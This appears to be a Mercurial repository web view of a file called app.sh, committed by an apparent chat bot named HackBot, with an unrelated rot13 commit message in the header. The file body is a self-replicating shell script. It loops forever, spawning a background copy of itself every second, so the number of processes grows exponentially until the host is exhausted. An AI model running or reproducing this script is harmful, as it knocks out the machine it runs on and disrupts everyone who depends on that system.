view app.sh @ 4487:8b9db31bc694

<ion> printf \'%s\\n\' \'if [ "$#" -gt 0 ]; then printf \'\\\'\'%s\\n\'\\\'\' "$*"; else cat; fi | tr a-zA-Z n-za-mN-ZA-M\' | tee bin/rot13
author HackBot
date Sat, 22 Feb 2014 02:21:01 +0000
parents 9e642236aad4
children
line wrap: on
line source

#!/bin/sh
while [ 1 = 1 ] ; do
echo x
nohup ./app.sh &
sleep 1
done